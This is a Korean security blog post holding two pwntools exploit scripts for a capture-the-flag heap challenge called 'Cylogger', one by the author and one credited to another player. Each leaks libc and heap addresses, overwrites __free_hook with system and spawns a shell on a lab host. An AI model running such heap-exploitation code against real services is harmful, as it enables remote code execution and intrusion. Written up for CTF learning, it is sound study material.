cdor1's lab
WHL_Cykor - Cylogger 본문
서브취약점(OOB-Out Of Bound) 브포해서 풀었지만 실수로 쉘을 날려보낸 슬픈 스토리가 있는 익스코드이다.
from pwn import *
#s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'})
while True:
try:
s = remote('10.10.200.203', 10002)
def Leave(select, size, data):
s.recvuntil('>> ')
s.sendline('L')
s.recvuntil('>> ')
s.sendline(str(select))
if(select == 1):
s.recvuntil('Size of Log >>')
s.sendline(str(size))
s.sendline(data)
def See(index):
s.recvuntil('>> ')
s.sendline('S')
s.recvuntil('Index >> ')
s.sendline(str(index))
def Remove(index):
s.recvuntil('>> ')
s.sendline('R')
s.recvuntil('Index >> ')
s.sendline(str(index))
def reseT():
s.recvuntil('>> ')
s.sendline('T')
def Change(index, data):
s.recvuntil('>> ')
s.sendline('C')
s.recvuntil('Index >> ')
s.sendline(str(index))
s.sendline(data)
def All():
s.recvuntil('>> ')
s.sendline('A')
print s.recvuntil('Ur Name? >>')
s.sendline('cdor1')
Leave(1, 1024, 'aaaa')
Leave(1, 1024, 'bbbb')
Leave(1, 1024, 'cccc')
Remove(0)
Remove(1)
Leave(1, 1024, 'bbbbbbbb')
See(1)
s.recvuntil('bbbbbbbb\n')
leak = u64(('\x68' + s.recv(5)).ljust(8, '\x00'))
base = leak - 0x3c2068
system = base + 0x456a0
free_hook = base + 0x3c3788
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))
log.info('free_hook : ' + hex(free_hook))
Change(1, 'b'*16)
See(1)
s.recvuntil('Log : bbbbbbbbbbbbbbbb\n')
heap_leak = u64(('\x00' + s.recv(5)).ljust(8, '\x00'))
log.info('heap_leak : ' + hex(heap_leak))
Remove(1)
Remove(2)
payload = p64(heap_leak + 0x28)
payload += p64(0)*2
payload += p64(heap_leak + 0x28 + 8)
payload += p64(1)
payload += p64(free_hook)
payload += p64(0x64)
payload += p64(heap_leak + 0x28 + 8) * 120
Leave(1, 1024, payload)
for i in range(0, 100):
Leave(1, 1024, p64(heap_leak + 0x28 + 8) * 127)
reseT()
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))
log.info('free_hook : ' + hex(free_hook))
log.info('heap_leak : ' + hex(heap_leak))
#raw_input()
Change(606858, p64(system))
Leave(1, 100, '/bin/sh\x00')
Remove(0)
s.sendline("ls")
print p.recv()
s.sendline("./flag_x")
print p.recv()
s.interactive()
except Exception as e:
pass
finally:
s.close()
원래 취약점 익스코드 by Demon-이진우
from pwn import *
s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'})
#s = remote('10.10.200.203', 10002)
# login
name = 'qwer'
s.recvuntil('>>')
s.sendline(name)
def go(n):
nl = [0,'L','S','R','T','C','A','E']
s.recvuntil('xit')
s.recvuntil('>>')
s.sendline(nl[n])
def make(t,m,sz=None):
go(1)
s.recvuntil('>>')
s.sendline(str(t))
if t == 2:
s.send(m)
else:
s.recvuntil('ize of Log >>')
s.sendline(str(sz))
s.send(m)
def rm(t):
go(3)
s.recvuntil('Index >>')
s.sendline(str(t))
def se(t,tt):
go(5)
s.recvuntil('Index >>')
s.sendline(str(t))
s.send(tt)
for i in range(3):
make(1,'a',256)
rm(2)
make(1,'a',256)
go(6)
s.recvuntil('[2')
s.recvuntil('Log : a')
lbc = u64('\x00'+s.recvline().replace('\n','').ljust(7,'\x00'))-2816
rm(3);rm(2);rm(1);rm(0)
make(2,'A')
go(6)
s.recvuntil('[0] Log : A')
hp = u64('\x00'+s.recvline().replace('\n','').ljust(7,'\x00'))
rm(0)
for i in range(2):
make(1,'A'*240+'\x00'*8+'\x30'+'\x00'*7,256)
rm(1);rm(0)
raw_input()
print '0x%x'%lbc
print '0x%x'%hp
'''1. [L]eave log
2. [S]ee my log
3. [R]emove my log
4. rese[T] my log
5. [C]hange my log
6. [A]ll log'''
# go(4)
make(2,'qwer')
make(2,'asdaf')
make(2,'zxcv')
make(2,'1234')
#make(2,'5678')
rm(0)
raw_input('1')
go(4)
raw_input('2')
make(2,'1'*20)
make(2,(p64(0x30)*3)[:-1])
raw_input('3')
#make(3,'3'*20)
make(1,'A'*40,80)
rm(3)
rm(1)
rm(0)
make(1,p64(hp+0x380)+'FASTBINCONTROL',40)
raw_input('4')
rm(1)
raw_input('5')
make(2,'tmp')
raw_input('6')
#make(2,'BOOMB')
make(2,'A'*8+p32(1)+p32(0)+p64(lbc+2800)+p32(8)) #make fake
se(0,p64(lbc-2947503))
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
pwnable.tw SecretGarden (0) | 2017.09.01 |
---|---|
pwnable.tw babystack (0) | 2017.08.31 |
pwnable.tw unexploitable (0) | 2017.08.11 |
pwnable.tw spirited_away (0) | 2017.08.11 |
pwnable.tw dubblesort (0) | 2017.08.10 |
Comments